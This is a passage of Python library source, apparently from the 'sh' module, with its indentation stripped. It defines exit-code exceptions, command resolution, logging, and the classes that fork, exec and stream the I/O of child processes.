# attempt to convert the thing to unicode from the system's encoding
try:
s = unicode(s, DEFAULT_ENCODING)
# if the thing is already unicode, or it's a number, it can't be
# coerced to unicode with an encoding argument, but if we leave out
# the encoding argument, it will convert it to a string, then to unicode
except TypeError:
s = unicode(s)
# now that we have guaranteed unicode, encode to our system encoding,
# but attempt to fall back to something
try:
s = s.encode(DEFAULT_ENCODING)
except:
s = s.encode(fallback_encoding)
return s
class ErrorReturnCode(Exception):
""" base class for all exceptions as a result of a command's exit status
being deemed an error. this base class is dynamically subclassed into
derived classes with the format: ErrorReturnCode_NNN where NNN is the exit
code number. the reason for this is it reduces boiler plate code when
testing error return codes:
try:
some_cmd()
except ErrorReturnCode_12:
print("couldn't do X")
vs:
try:
some_cmd()
except ErrorReturnCode as e:
if e.exit_code == 12:
print("couldn't do X")
it's not much of a savings, but i believe it makes the code easier to read """
truncate_cap = 750
def __init__(self, full_cmd, stdout, stderr):
self.full_cmd = full_cmd
self.stdout = stdout
self.stderr = stderr
if self.stdout is None:
exc_stdout = "<redirected>"
else:
exc_stdout = self.stdout[:self.truncate_cap]
out_delta = len(self.stdout) - len(exc_stdout)
if out_delta:
exc_stdout += ("... (%d more, please see e.stdout)" % out_delta).encode()
if self.stderr is None:
exc_stderr = "<redirected>"
else:
exc_stderr = self.stderr[:self.truncate_cap]
err_delta = len(self.stderr) - len(exc_stderr)
if err_delta:
exc_stderr += ("... (%d more, please see e.stderr)" % err_delta).encode()
msg = "\n\n RAN: %r\n\n STDOUT:\n%s\n\n STDERR:\n%s" % \
(full_cmd, exc_stdout.decode(DEFAULT_ENCODING, "replace"),
exc_stderr.decode(DEFAULT_ENCODING, "replace"))
super(ErrorReturnCode, self).__init__(msg)
class SignalException(ErrorReturnCode): pass
class TimeoutException(Exception):
""" the exception thrown when a command is killed because a specified
timeout (via _timeout) was hit """
def __init__(self, exit_code):
self.exit_code = exit_code
super(Exception, self).__init__()
SIGNALS_THAT_SHOULD_THROW_EXCEPTION = (
signal.SIGABRT,
signal.SIGBUS,
signal.SIGFPE,
signal.SIGILL,
signal.SIGINT,
signal.SIGKILL,
signal.SIGPIPE,
signal.SIGQUIT,
signal.SIGSEGV,
signal.SIGTERM,
signal.SIGSYS,
)
# we subclass AttributeError because:
# https://github.com/ipython/ipython/issues/2577
# https://github.com/amoffat/sh/issues/97#issuecomment-10610629
class CommandNotFound(AttributeError): pass
rc_exc_regex = re.compile("(ErrorReturnCode|SignalException)_((\d+)|SIG\w+)")
rc_exc_cache = {}
def get_exc_from_name(name):
""" takes an exception name, like:
ErrorReturnCode_1
SignalException_9
SignalException_SIGHUP
and returns the corresponding exception. this is primarily used for
importing exceptions from sh into user code, for instance, to capture those
exceptions """
exc = None
try:
return rc_exc_cache[name]
except KeyError:
m = rc_exc_regex.match(name)
if m:
base = m.group(1)
rc_or_sig_name = m.group(2)
if base == "SignalException":
try:
rc = -int(rc_or_sig_name)
except ValueError:
rc = -getattr(signal, rc_or_sig_name)
else:
rc = int(rc_or_sig_name)
exc = get_rc_exc(rc)
return exc
def get_rc_exc(rc_or_sig_name):
""" takes a exit code, signal number, or signal name, and produces an
exception that corresponds to that return code. positive return codes yield
ErrorReturnCode exception, negative return codes yield SignalException
we also cache the generated exception so that only one signal of that type
exists, preserving identity """
try:
rc = int(rc_or_sig_name)
except ValueError:
rc = -getattr(signal, rc_or_sig_name)
try:
return rc_exc_cache[rc]
except KeyError:
pass
if rc > 0:
name = "ErrorReturnCode_%d" % rc
base = ErrorReturnCode
else:
name = "SignalException_%d" % abs(rc)
base = SignalException
exc = type(name, (base,), {"exit_code": rc})
rc_exc_cache[rc] = exc
return exc
def which(program):
def is_exe(fpath):
return (os.path.exists(fpath) and
os.access(fpath, os.X_OK) and
os.path.isfile(os.path.realpath(fpath)))
fpath, fname = os.path.split(program)
if fpath:
if is_exe(program):
return program
else:
if "PATH" not in os.environ:
return None
for path in os.environ["PATH"].split(os.pathsep):
exe_file = os.path.join(path, program)
if is_exe(exe_file):
return exe_file
return None
def resolve_program(program):
path = which(program)
if not path:
# our actual command might have a dash in it, but we can't call
# that from python (we have to use underscores), so we'll check
# if a dash version of our underscore command exists and use that
# if it does
if "_" in program:
path = which(program.replace("_", "-"))
if not path:
return None
return path
# we add this thin wrapper to glob.glob because of a specific edge case where
# glob does not expand to anything. for example, if you try to do
# glob.glob("*.py") and there are no *.py files in the directory, glob.glob
# returns an empty list. this empty list gets passed to the command, and
# then the command fails with a misleading error message. this thin wrapper
# ensures that if there is no expansion, we pass in the original argument,
# so that when the command fails, the error message is clearer
def glob(arg):
return original_glob(arg) or arg
class Logger(object):
""" provides a memory-inexpensive logger. a gotcha about python's builtin
logger is that logger objects are never garbage collected. if you create a
thousand loggers with unique names, they'll sit there in memory until your
script is done. with sh, it's easy to create loggers with unique names if
we want our loggers to include our command arguments. for example, these
are all unique loggers:
ls -l
ls -l /tmp
ls /tmp
so instead of creating unique loggers, and without sacrificing logging
output, we use this class, which maintains as part of its state, the logging
"context", which will be the very unique name. this allows us to get a
logger with a very general name, eg: "command", and have a unique name
appended to it via the context, eg: "ls -l /tmp" """
def __init__(self, name, context=None):
self.name = name
if context:
context = context.replace("%", "%%")
self.context = context
self.log = logging.getLogger("%s.%s" % (SH_LOGGER_NAME, name))
def _format_msg(self, msg, *args):
if self.context:
msg = "%s: %s" % (self.context, msg)
return msg % args
def get_child(self, name, context):
new_name = self.name + "." + name
new_context = self.context + "." + context
l = Logger(new_name, new_context)
return l
def info(self, msg, *args):
self.log.info(self._format_msg(msg, *args))
def debug(self, msg, *args):
self.log.debug(self._format_msg(msg, *args))
def error(self, msg, *args):
self.log.error(self._format_msg(msg, *args))
def exception(self, msg, *args):
self.log.exception(self._format_msg(msg, *args))
def friendly_truncate(s, max_len):
if len(s) > max_len:
s = "%s...(%d more)" % (s[:max_len], len(s) - max_len)
return s
class RunningCommand(object):
""" this represents an executing Command object. it is returned as the
result of __call__() being executed on a Command instance. this creates a
reference to a OProc instance, which is a low-level wrapper around the
process that was exec'd
this is the class that gets manipulated the most by user code, and so it
implements various convenience methods and logical mechanisms for the
underlying process. for example, if a user tries to access a
backgrounded-process's stdout/err, the RunningCommand object is smart enough
to know to wait() on the process to finish first. and when the process
finishes, RunningCommand is smart enough to translate exit codes to
exceptions. """
def __init__(self, cmd, call_args, stdin, stdout, stderr):
# self.ran is used for auditing what actually ran. for example, in
# exceptions, or if you just want to know what was ran after the
# command ran
if IS_PY3:
self.ran = " ".join([arg.decode(DEFAULT_ENCODING, "ignore") for arg in cmd])
else:
self.ran = " ".join(cmd)
friendly_cmd = friendly_truncate(self.ran, 20)
friendly_call_args = friendly_truncate(str(call_args), 20)
# we're setting up the logger string here, instead of __repr__ because
# we reserve __repr__ to behave as if it was evaluating the child
# process's output
logger_str = "<Command %r call_args %s>" % (friendly_cmd,
friendly_call_args)
self.log = Logger("command", logger_str)
self.call_args = call_args
self.cmd = cmd
self.process = None
self._process_completed = False
should_wait = True
spawn_process = True
# with contexts shouldn't run at all yet, they prepend
# to every command in the context
if call_args["with"]:
spawn_process = False
Command._prepend_stack.append(self)
if call_args["piped"] or call_args["iter"] or call_args["iter_noblock"]:
should_wait = False
# we're running in the background, return self and let us lazily
# evaluate
if call_args["bg"]:
should_wait = False
# redirection
if call_args["err_to_out"]:
stderr = OProc.STDOUT
# set up which stream should write to the pipe
# TODO, make pipe None by default and limit the size of the Queue
# in oproc.OProc
pipe = OProc.STDOUT
if call_args["iter"] == "out" or call_args["iter"] is True:
pipe = OProc.STDOUT
elif call_args["iter"] == "err":
pipe = OProc.STDERR
if call_args["iter_noblock"] == "out" or call_args["iter_noblock"] is True:
pipe = OProc.STDOUT
elif call_args["iter_noblock"] == "err":
pipe = OProc.STDERR
# there's currently only one case where we wouldn't spawn a child
# process, and that's if we're using a with-context with our command
if spawn_process:
self.log.info("starting process")
self.process = OProc(self.log, cmd, stdin, stdout, stderr,
self.call_args, pipe)
if should_wait:
self.wait()
def wait(self):
if not self._process_completed:
self._process_completed = True
exit_code = self.process.wait()
if self.process.timed_out:
# if we timed out, our exit code represents a signal, which is
# negative, so let's make it positive to store in our
# TimeoutException
raise TimeoutException(-exit_code)
else:
self.handle_command_exit_code(exit_code)
# https://github.com/amoffat/sh/issues/185
if self.call_args["done"]:
self.call_args["done"](self)
return self
def handle_command_exit_code(self, code):
""" here we determine if we had an exception, or an error code that we
weren't expecting to see. if we did, we create and raise an exception
"""
if (code not in self.call_args["ok_code"] and (code > 0 or -code in
SIGNALS_THAT_SHOULD_THROW_EXCEPTION)):
exc = get_rc_exc(code)
raise exc(self.ran, self.process.stdout, self.process.stderr)
@property
def stdout(self):
self.wait()
return self.process.stdout
@property
def stderr(self):
self.wait()
return self.process.stderr
@property
def exit_code(self):
self.wait()
return self.process.exit_code
@property
def pid(self):
return self.process.pid
def __len__(self):
return len(str(self))
def __enter__(self):
""" we don't actually do anything here because anything that should have
been done would have been done in the Command.__call__ call.
essentially all that has to happen is the comand be pushed on the
prepend stack. """
with_context_warning()
def __iter__(self):
return self
def next(self):
""" allow us to iterate over the output of our command """
# we do this because if get blocks, we can't catch a KeyboardInterrupt
# so the slight timeout allows for that.
while True:
try:
chunk = self.process._pipe_queue.get(True, 0.001)
except Empty:
if self.call_args["iter_noblock"]:
return errno.EWOULDBLOCK
else:
if chunk is None:
self.wait()
raise StopIteration()
try:
return chunk.decode(self.call_args["encoding"],
self.call_args["decode_errors"])
except UnicodeDecodeError:
return chunk
# python 3
__next__ = next
def __exit__(self, typ, value, traceback):
if self.call_args["with"] and Command._prepend_stack:
Command._prepend_stack.pop()
def __str__(self):
""" in python3, should return unicode. in python2, should return a
string of bytes """
if IS_PY3:
return self.__unicode__()
else:
return unicode(self).encode(self.call_args["encoding"])
def __unicode__(self):
""" a magic method defined for python2. calling unicode() on a
RunningCommand object will call this """
if self.process and self.stdout:
return self.stdout.decode(self.call_args["encoding"],
self.call_args["decode_errors"])
elif IS_PY3:
return ""
else:
return unicode("")
def __eq__(self, other):
return unicode(self) == unicode(other)
__hash__ = None # Avoid DeprecationWarning in Python < 3
def __contains__(self, item):
return item in str(self)
def __getattr__(self, p):
# let these three attributes pass through to the OProc object
if p in ("signal", "terminate", "kill"):
if self.process:
return getattr(self.process, p)
else:
raise AttributeError
# see if strings have what we're looking for. we're looking at the
# method names explicitly because we don't want to evaluate self unless
# we absolutely have to, the reason being, in python2, hasattr swallows
# exceptions, and if we try to run hasattr on a command that failed and
# is being run with _iter=True, the command will be evaluated, throw an
# exception, but hasattr will discard it
if p in _unicode_methods:
return getattr(unicode(self), p)
raise AttributeError
def __repr__(self):
""" in python3, should return unicode. in python2, should return a
string of bytes """
try:
return str(self)
except UnicodeDecodeError:
if self.process:
if self.stdout:
return repr(self.stdout)
return repr("")
def __long__(self):
return long(str(self).strip())
def __float__(self):
return float(str(self).strip())
def __int__(self):
return int(str(self).strip())
def output_redirect_is_filename(out):
return out \
and not callable(out) \
and not hasattr(out, "write") \
and not isinstance(out, (cStringIO, StringIO))
class Command(object):
""" represents an un-run system program, like "ls" or "cd". because it
represents the program itself (and not a running instance of it), it should
hold very little state. in fact, the only state it does hold is baked
arguments.
when a Command object is called, the result that is returned is a
RunningCommand object, which represents the Command put into an execution
state. """
_prepend_stack = []
_call_args = {
# currently unsupported
#"fg": False, # run command in foreground
# run a command in the background. commands run in the background
# ignore SIGHUP and do not automatically exit when the parent process
# ends
"bg": False,
"with": False, # prepend the command to every command after it
"in": None,
"out": None, # redirect STDOUT
"err": None, # redirect STDERR
"err_to_out": None, # redirect STDERR to STDOUT
# stdin buffer size
# 1 for line, 0 for unbuffered, any other number for that amount
"in_bufsize": 0,
# stdout buffer size, same values as above
"out_bufsize": 1,
"err_bufsize": 1,
# this is how big the output buffers will be for stdout and stderr.
# this is essentially how much output they will store from the process.
# we use a deque, so if it overflows past this amount, the first items
# get pushed off as each new item gets added.
#
# NOTICE
# this is not a *BYTE* size, this is a *CHUNK* size...meaning, that if
# you're buffering out/err at 1024 bytes, the internal buffer size will
# be "internal_bufsize" CHUNKS of 1024 bytes
"internal_bufsize": 3 * 1024 ** 2,
"env": None,
"piped": None,
"iter": None,
"iter_noblock": None,
"ok_code": 0,
"cwd": None,
# the separator delimiting between a long-argument's name and its value
# for example, --arg=derp, '=' is the long_sep
"long_sep": "=",
# this is for programs that expect their input to be from a terminal.
# ssh is one of those programs
"tty_in": False,
"tty_out": True,
"encoding": DEFAULT_ENCODING,
"decode_errors": "strict",
# how long the process should run before it is auto-killed
"timeout": 0,
"timeout_signal": signal.SIGKILL,
# TODO write some docs on "long-running processes"
# these control whether or not stdout/err will get aggregated together
# as the process runs. this has memory usage implications, so sometimes
# with long-running processes with a lot of data, it makes sense to
# set these to true
"no_out": False,
"no_err": False,
"no_pipe": False,
# if any redirection is used for stdout or stderr, internal buffering
# of that data is not stored. this forces it to be stored, as if
# the output is being T'd to both the redirected destination and our
# internal buffers
"tee": None,
# will be called when a process terminates without exception. this
# option also puts the command in the background, since it doesn't make
# sense to have an un-backgrounded command with a done callback
"done": None,
# a tuple (rows, columns) of the desired size of both the stdout and
# stdin ttys, if ttys are being used
"tty_size": (20, 80),
}
# these are arguments that cannot be called together, because they wouldn't
# make any sense
_incompatible_call_args = (
#("fg", "bg", "Command can't be run in the foreground and background"),
("err", "err_to_out", "Stderr is already being redirected"),
("piped", "iter", "You cannot iterate when this command is being piped"),
("piped", "no_pipe", "Using a pipe doesn't make sense if you've \
disabled the pipe"),
("no_out", "iter", "You cannot iterate over output if there is no \
output"),
)
# this method exists because of the need to have some way of letting
# manual object instantiation not perform the underscore-to-dash command
# conversion that resolve_program uses.
#
# there are 2 ways to create a Command object. using sh.Command(<program>)
# or by using sh.<program>. the method fed into sh.Command must be taken
# literally, and so no underscore-dash conversion is performed. the one
# for sh.<program> must do the underscore-dash converesion, because we
# can't type dashes in method names
@classmethod
def _create(cls, program, **default_kwargs):
path = resolve_program(program)
if not path:
raise CommandNotFound(program)
cmd = cls(path)
if default_kwargs:
cmd = cmd.bake(**default_kwargs)
return cmd
def __init__(self, path):
found = which(path)
if not found:
raise CommandNotFound(path)
self._path = encode_to_py3bytes_or_py2str(found)
self._partial = False
self._partial_baked_args = []
self._partial_call_args = {}
# bugfix for functools.wraps. issue #121
self.__name__ = str(self)
def __getattribute__(self, name):
# convenience
getattr = partial(object.__getattribute__, self)
if name.startswith("_"):
return getattr(name)
if name == "bake":
return getattr("bake")
if name.endswith("_"):
name = name[:-1]
return getattr("bake")(name)
@staticmethod
def _extract_call_args(kwargs, to_override={}):
kwargs = kwargs.copy()
call_args = {}
for parg, default in Command._call_args.items():
key = "_" + parg
if key in kwargs:
call_args[parg] = kwargs[key]
del kwargs[key]
elif parg in to_override:
call_args[parg] = to_override[parg]
# test for incompatible call args
s1 = set(call_args.keys())
for args in Command._incompatible_call_args:
args = list(args)
error = args.pop()
if s1.issuperset(args):
raise TypeError("Invalid special arguments %r: %s" % (args, error))
return call_args, kwargs
def _aggregate_keywords(self, keywords, sep, raw=False):
processed = []
for k, v in keywords.items():
# we're passing a short arg as a kwarg, example:
# cut(d="\t")
if len(k) == 1:
if v is not False:
processed.append(encode_to_py3bytes_or_py2str("-" + k))
if v is not True:
processed.append(encode_to_py3bytes_or_py2str(v))
# we're doing a long arg
else:
if not raw:
k = k.replace("_", "-")
if v is True:
processed.append(encode_to_py3bytes_or_py2str("--" + k))
elif v is False:
pass
else:
arg = encode_to_py3bytes_or_py2str("--%s%s%s" % (k, sep, v))
processed.append(arg)
return processed
def _compile_args(self, args, kwargs, sep):
processed_args = []
# aggregate positional args
for arg in args:
if isinstance(arg, (list, tuple)):
if not arg:
warnings.warn("Empty list passed as an argument to %r. \
If you're using glob.glob(), please use sh.glob() instead." % self._path, stacklevel=3)
for sub_arg in arg:
processed_args.append(encode_to_py3bytes_or_py2str(sub_arg))
elif isinstance(arg, dict):
processed_args += self._aggregate_keywords(arg, sep, raw=True)
else:
processed_args.append(encode_to_py3bytes_or_py2str(arg))
# aggregate the keyword arguments
processed_args += self._aggregate_keywords(kwargs, sep)
return processed_args
# TODO needs documentation
def bake(self, *args, **kwargs):
fn = Command(self._path)
fn._partial = True
call_args, kwargs = self._extract_call_args(kwargs)
pruned_call_args = call_args
for k, v in Command._call_args.items():
try:
if pruned_call_args[k] == v:
del pruned_call_args[k]
except KeyError:
continue
fn._partial_call_args.update(self._partial_call_args)
fn._partial_call_args.update(pruned_call_args)
fn._partial_baked_args.extend(self._partial_baked_args)
sep = pruned_call_args.get("long_sep", self._call_args["long_sep"])
fn._partial_baked_args.extend(self._compile_args(args, kwargs, sep))
return fn
def __str__(self):
""" in python3, should return unicode. in python2, should return a
string of bytes """
if IS_PY3:
return self.__unicode__()
else:
return self.__unicode__().encode(DEFAULT_ENCODING)
def __eq__(self, other):
try:
return str(self) == str(other)
except:
return False
__hash__ = None # Avoid DeprecationWarning in Python < 3
def __repr__(self):
""" in python3, should return unicode. in python2, should return a
string of bytes """
return "<Command %r>" % str(self)
def __unicode__(self):
""" a magic method defined for python2. calling unicode() on a
self will call this """
baked_args = " ".join(item.decode(DEFAULT_ENCODING) for item in self._partial_baked_args)
if baked_args:
baked_args = " " + baked_args
return self._path.decode(DEFAULT_ENCODING) + baked_args
def __enter__(self):
with_context_warning()
self(_with=True)
def __exit__(self, typ, value, traceback):
Command._prepend_stack.pop()
def __call__(self, *args, **kwargs):
kwargs = kwargs.copy()
args = list(args)
cmd = []
# aggregate any 'with' contexts
call_args = Command._call_args.copy()
for prepend in self._prepend_stack:
# don't pass the 'with' call arg
pcall_args = prepend.call_args.copy()
try:
del pcall_args["with"]
except:
pass
call_args.update(pcall_args)
cmd.extend(prepend.cmd)
cmd.append(self._path)
# here we extract the special kwargs and override any
# special kwargs from the possibly baked command
tmp_call_args, kwargs = self._extract_call_args(kwargs, self._partial_call_args)
call_args.update(tmp_call_args)
if not getattr(call_args["ok_code"], "__iter__", None):
call_args["ok_code"] = [call_args["ok_code"]]
if call_args["done"]:
call_args["bg"] = True
# check if we're piping via composition
stdin = call_args["in"]
if args:
first_arg = args.pop(0)
if isinstance(first_arg, RunningCommand):
# it makes sense that if the input pipe of a command is running
# in the background, then this command should run in the
# background as well
if first_arg.call_args["bg"]:
call_args["bg"] = True
if first_arg.call_args["piped"] == "direct":
stdin = first_arg.process
else:
stdin = first_arg.process._pipe_queue
else:
args.insert(0, first_arg)
processed_args = self._compile_args(args, kwargs, call_args["long_sep"])
# makes sure our arguments are broken up correctly
split_args = self._partial_baked_args + processed_args
final_args = split_args
cmd.extend(final_args)
# stdout redirection
stdout = call_args["out"]
if output_redirect_is_filename(stdout):
stdout = open(str(stdout), "wb")
# stderr redirection
stderr = call_args["err"]
if output_redirect_is_filename(stderr):
stderr = open(str(stderr), "wb")
return RunningCommand(cmd, call_args, stdin, stdout, stderr)
def _start_daemon_thread(fn, *args):
thrd = threading.Thread(target=fn, args=args)
thrd.daemon = True
thrd.start()
return thrd
def setwinsize(fd, rows_cols):
""" set the terminal size of a tty file descriptor. borrowed logic
from pexpect.py """
rows, cols = rows_cols
TIOCSWINSZ = getattr(termios, 'TIOCSWINSZ', -2146929561)
s = struct.pack('HHHH', rows, cols, 0, 0)
fcntl.ioctl(fd, TIOCSWINSZ, s)
def construct_streamreader_callback(process, handler):
""" here we're constructing a closure for our streamreader callback. this
is used in the case that we pass a callback into _out or _err, meaning we
want to our callback to handle each bit of output
we construct the closure based on how many arguments it takes. the reason
for this is to make it as easy as possible for people to use, without
limiting them. a new user will assume the callback takes 1 argument (the
data). as they get more advanced, they may want to terminate the process,
or pass some stdin back, and will realize that they can pass a callback of
more args """
# implied arg refers to the "self" that methods will pass in. we need to
# account for this implied arg when figuring out what function the user
# passed in based on number of args
implied_arg = 0
partial_args = 0
handler_to_inspect = handler
if isinstance(handler, partial):
partial_args = len(handler.args)
handler_to_inspect = handler.func
if inspect.ismethod(handler_to_inspect):
implied_arg = 1
num_args = len(inspect.getargspec(handler_to_inspect).args)
else:
if inspect.isfunction(handler_to_inspect):
num_args = len(inspect.getargspec(handler_to_inspect).args)
# is an object instance with __call__ method
else:
implied_arg = 1
num_args = len(inspect.getargspec(handler_to_inspect.__call__).args)
net_args = num_args - implied_arg - partial_args
handler_args = ()
# just the chunk
if net_args == 1:
handler_args = ()
# chunk, stdin
if net_args == 2:
handler_args = (process.stdin,)
# chunk, stdin, process
elif net_args == 3:
# notice we're only storing a weakref, to prevent cyclic references
# (where the process holds a streamreader, and a streamreader holds a
# handler-closure with a reference to the process
handler_args = (process.stdin, weakref.ref(process))
def fn(chunk):
# this is pretty ugly, but we're evaluating the process at call-time,
# because it's a weakref
args = handler_args
if len(args) == 2:
args = (handler_args[0], handler_args[1]())
return handler(chunk, *args)
return fn
def handle_process_exit_code(exit_code):
""" this should only ever be called once for each child process """
# if we exited from a signal, let our exit code reflect that
if os.WIFSIGNALED(exit_code):
return -os.WTERMSIG(exit_code)
# otherwise just give us a normal exit code
elif os.WIFEXITED(exit_code):
return os.WEXITSTATUS(exit_code)
else:
raise RuntimeError("Unknown child exit status!")
class OProc(object):
""" this class is instantiated by RunningCommand for a command to be exec'd.
it handles all the nasty business involved with correctly setting up the
input/output to the child process. it gets its name for subprocess.Popen
(process open) but we're calling ours OProc (open process) """
_default_window_size = (24, 80)
# used in redirecting
STDOUT = -1
STDERR = -2
def __init__(self, parent_log, cmd, stdin, stdout, stderr, call_args, pipe):
"""
cmd is the full string that will be exec'd. it includes the program
name and all its arguments
stdin, stdout, stderr are what the child will use for standard
input/output/err
call_args is a mapping of all the special keyword arguments to apply
to the child process
"""
self.call_args = call_args
# I had issues with getting 'Input/Output error reading stdin' from dd,
# until I set _tty_out=False
if self.call_args["piped"] == "direct":
self.call_args["tty_out"] = False
self._single_tty = self.call_args["tty_in"] and self.call_args["tty_out"]
# this logic is a little convoluted, but basically this top-level
# if/else is for consolidating input and output TTYs into a single
# TTY. this is the only way some secure programs like ssh will
# output correctly (is if stdout and stdin are both the same TTY)
if self._single_tty:
self._stdin_fd, self._slave_stdin_fd = pty.openpty()
self._stdout_fd = self._stdin_fd
self._slave_stdout_fd = self._slave_stdin_fd
self._stderr_fd = self._stdin_fd
self._slave_stderr_fd = self._slave_stdin_fd
# do not consolidate stdin and stdout. this is the most common use-
# case
else:
# this check here is because we may be doing "direct" piping
# (_piped="direct"), and so our stdin might be an instance of
# OProc
if isinstance(stdin, OProc):
self._slave_stdin_fd = stdin._stdout_fd
self._stdin_fd = None
elif self.call_args["tty_in"]:
self._slave_stdin_fd, self._stdin_fd = pty.openpty()
# tty_in=False is the default
else:
self._slave_stdin_fd, self._stdin_fd = os.pipe()
# tty_out=True is the default
if self.call_args["tty_out"]:
self._stdout_fd, self._slave_stdout_fd = pty.openpty()
else:
self._stdout_fd, self._slave_stdout_fd = os.pipe()
# unless STDERR is going to STDOUT, it ALWAYS needs to be a pipe,
# and never a PTY. the reason for this is not totally clear to me,
# but it has to do with the fact that if STDERR isn't set as the
# CTTY (because STDOUT is), the STDERR buffer won't always flush
# by the time the process exits, and the data will be lost.
# i've only seen this on OSX.
if stderr is not OProc.STDOUT:
self._stderr_fd, self._slave_stderr_fd = os.pipe()
# this is a hack, but what we're doing here is intentionally throwing an
# OSError exception if our child processes's directory doesn't exist,
# but we're doing it BEFORE we fork. the reason for before the fork is
# error handling. i'm currently too lazy to implement what
# subprocess.py did and set up a error pipe to handle exceptions that
# happen in the child between fork and exec. it has only been seen in
# the wild for a missing cwd, so we'll handle it here.
cwd = self.call_args["cwd"]
if cwd is not None and not os.path.exists(cwd):
os.chdir(cwd)
gc_enabled = gc.isenabled()
if gc_enabled:
gc.disable()
self.pid = os.fork()
# child
if self.pid == 0: # pragma: no cover
try:
# ignoring SIGHUP lets us persist even after the parent process
# exits. only ignore if we're backgrounded
if self.call_args["bg"] is True:
signal.signal(signal.SIGHUP, signal.SIG_IGN)
# this piece of ugliness is due to a bug where we can lose output
# if we do os.close(self._slave_stdout_fd) in the parent after
# the child starts writing.
# see http://bugs.python.org/issue15898
if IS_OSX:
time.sleep(0.01)
os.setsid()
if self.call_args["tty_out"]:
# set raw mode, so there isn't any weird translation of
# newlines to \r\n and other oddities. we're not outputting
# to a terminal anyways
#
# we HAVE to do this here, and not in the parent process,
# because we have to guarantee that this is set before the
# child process is run, and we can't do it twice.
tty.setraw(self._slave_stdout_fd)
# if the parent-side fd for stdin exists, close it. the case
# where it may not exist is if we're using piped="direct"
if self._stdin_fd:
os.close(self._stdin_fd)
if not self._single_tty:
os.close(self._stdout_fd)
if stderr is not OProc.STDOUT:
os.close(self._stderr_fd)
if cwd:
os.chdir(cwd)
os.dup2(self._slave_stdin_fd, 0)
os.dup2(self._slave_stdout_fd, 1)
# we're not directing stderr to stdout? then set self._slave_stderr_fd to
# fd 2, the common stderr fd
if stderr is OProc.STDOUT:
os.dup2(self._slave_stdout_fd, 2)
else:
os.dup2(self._slave_stderr_fd, 2)
# don't inherit file descriptors
max_fd = resource.getrlimit(resource.RLIMIT_NOFILE)[0]
os.closerange(3, max_fd)
# set our controlling terminal. tty_out defaults to true
if self.call_args["tty_out"]:
tmp_fd = os.open(os.ttyname(1), os.O_RDWR)
os.close(tmp_fd)
if self.call_args["tty_out"]:
setwinsize(1, self.call_args["tty_size"])
# actually execute the process
if self.call_args["env"] is None:
os.execv(cmd[0], cmd)
else:
os.execve(cmd[0], cmd, self.call_args["env"])
# we must ensure that we ALWAYS exit the child process, otherwise
# the parent process code will be executed twice on exception
# https://github.com/amoffat/sh/issues/202
#
# if your parent process experiences an exit code 255, it is most
# likely that an exception occurred between the fork of the child
# and the exec. this should be reported.
finally:
os._exit(255)
# parent
else:
if gc_enabled:
gc.enable()
# used to determine what exception to raise. if our process was
# killed via a timeout counter, we'll raise something different than
# a SIGKILL exception
self.timed_out = False
self.started = time.time()
self.cmd = cmd
# exit code should only be manipulated from within self._wait_lock
# to prevent race conditions
self.exit_code = None
self.stdin = stdin or Queue()
# _pipe_queue is used internally to hand off stdout from one process
# to another. by default, all stdout from a process gets dumped
# into this pipe queue, to be consumed in real time (hence the
# thread-safe Queue), or at a potentially later time
self._pipe_queue = Queue()
# this is used to prevent a race condition when we're waiting for
# a process to end, and the OProc's internal threads are also checking
# for the processes's end
self._wait_lock = threading.Lock()
# these are for aggregating the stdout and stderr. we use a deque
# because we don't want to overflow
self._stdout = deque(maxlen=self.call_args["internal_bufsize"])
self._stderr = deque(maxlen=self.call_args["internal_bufsize"])
if self.call_args["tty_in"]:
setwinsize(self._stdin_fd, self.call_args["tty_size"])
self.log = parent_log.get_child("process", repr(self))
os.close(self._slave_stdin_fd)
if not self._single_tty:
os.close(self._slave_stdout_fd)
if stderr is not OProc.STDOUT:
os.close(self._slave_stderr_fd)
self.log.debug("started process")
if self.call_args["tty_in"]:
attr = termios.tcgetattr(self._stdin_fd)
attr[3] &= ~termios.ECHO
termios.tcsetattr(self._stdin_fd, termios.TCSANOW, attr)
# this represents the connection from a Queue object (or whatever
# we're using to feed STDIN) to the process's STDIN fd
self._stdin_stream = None
if not isinstance(self.stdin, OProc):
self._stdin_stream = \
StreamWriter(self.log.get_child("streamwriter",
"stdin"), self._stdin_fd, self.stdin,
self.call_args["in_bufsize"],
self.call_args["encoding"],
self.call_args["tty_in"])
stdout_pipe = None
if pipe is OProc.STDOUT and not self.call_args["no_pipe"]:
stdout_pipe = self._pipe_queue
# this represents the connection from a process's STDOUT fd to
# wherever it has to go, sometimes a pipe Queue (that we will use
# to pipe data to other processes), and also an internal deque
# that we use to aggregate all the output
save_stdout = not self.call_args["no_out"] and \
(self.call_args["tee"] in (True, "out") or stdout is None)
# if we're piping directly into another process's filedescriptor, we
# bypass reading from the stdout stream altogether, because we've
# already hooked up this processes's stdout fd to the other
# processes's stdin fd
self._stdout_stream = None
if self.call_args["piped"] != "direct":
if callable(stdout):
stdout = construct_streamreader_callback(self, stdout)
self._stdout_stream = \
StreamReader(self.log.get_child("streamreader",
"stdout"), self._stdout_fd, stdout, self._stdout,
self.call_args["out_bufsize"],
self.call_args["encoding"],
self.call_args["decode_errors"], stdout_pipe,
save_data=save_stdout)
if stderr is OProc.STDOUT or self._single_tty:
self._stderr_stream = None
else:
stderr_pipe = None
if pipe is OProc.STDERR and not self.call_args["no_pipe"]:
stderr_pipe = self._pipe_queue
save_stderr = not self.call_args["no_err"] and \
(self.call_args["tee"] in ("err",) or stderr is None)
if callable(stderr):
stderr = construct_streamreader_callback(self, stderr)
self._stderr_stream = StreamReader(Logger("streamreader"),
self._stderr_fd, stderr, self._stderr,
self.call_args["err_bufsize"], self.call_args["encoding"],
self.call_args["decode_errors"], stderr_pipe,
save_data=save_stderr)
# start the main io threads
# stdin thread is not needed if we are connecting from another process's stdout pipe
self._input_thread = None
if self._stdin_stream:
self._input_thread = _start_daemon_thread(self.input_thread,
self._stdin_stream)
self._output_thread = _start_daemon_thread(self.output_thread,
self._stdout_stream, self._stderr_stream,
self.call_args["timeout"], self.started,
self.call_args["timeout_signal"])
def __repr__(self):
return "<Process %d %r>" % (self.pid, self.cmd[:500])
def change_in_bufsize(self, buf):
self._stdin_stream.stream_bufferer.change_buffering(buf)
def change_out_bufsize(self, buf):
self._stdout_stream.stream_bufferer.change_buffering(buf)
def change_err_bufsize(self, buf):
self._stderr_stream.stream_bufferer.change_buffering(buf)
def input_thread(self, stdin):
""" this is run in a separate thread. it writes into our process's
stdin (a streamwriter) and waits the process to end AND everything that
can be written to be written """
done = False
while not done and self.is_alive():
self.log.debug("%r ready for more input", stdin)
done = stdin.write()
stdin.close()
def output_thread(self, stdout, stderr, timeout, started, timeout_exc):
